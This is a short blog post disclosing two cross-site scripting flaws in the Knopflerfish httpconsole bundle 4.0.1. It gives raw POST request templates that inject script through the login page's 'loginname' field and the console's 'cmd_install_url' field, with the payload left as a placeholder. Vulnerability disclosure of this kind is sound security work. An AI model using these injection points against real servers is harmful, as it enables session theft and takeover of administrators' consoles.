~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: Cross Site Scripting x2
[x] Vendor: Knopflerfish Project
[x] Vendor Website: https://www.knopflerfish.org
[x] Bundle Name: httpconsole
[x] Bundle Version: 4.0.1
[x] Bundle DL: https://www.knopflerfish.org/releases/current/osgi/jars/httpconsole/httpconsole_all-4.0.1.jar
[x] Found by: Anarchy Angel
[x] Twitter: @anarchyang31
[x] URL: https://aahideaway.blogspot.com
[x] Mail : anarchy[dot]ang31@gmail[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[1] Pre-authentication XSS in login page.
Method: POST
URL: http://knopflerfish-server:8080/servlet/console
Variable: loginname
exp:
POST /servlet/console HTTP/1.1
Host: http://knopflerfish-server:8080
...
loginname=[XSS]&loginpwd=asd&login_cmd=Login
====
[2] Post authentication XSS in management console.
Method: POST
URL: http://knopflerfish-server:8080/servlet/console
Variable: cmd_install_url
exp:
POST /servlet/console HTTP/1.1
Host: http://knopflerfish-server:8080
...
bundle_id=29&cmd_install_url=[XSS]&cmd_installurl=install
Ummm firsties? :)
Tuesday, July 24, 2018
Knopflerfish bundle httpconsole 4.0.1 XSS
Labels: LHFI
Subscribe to:
Posts (Atom)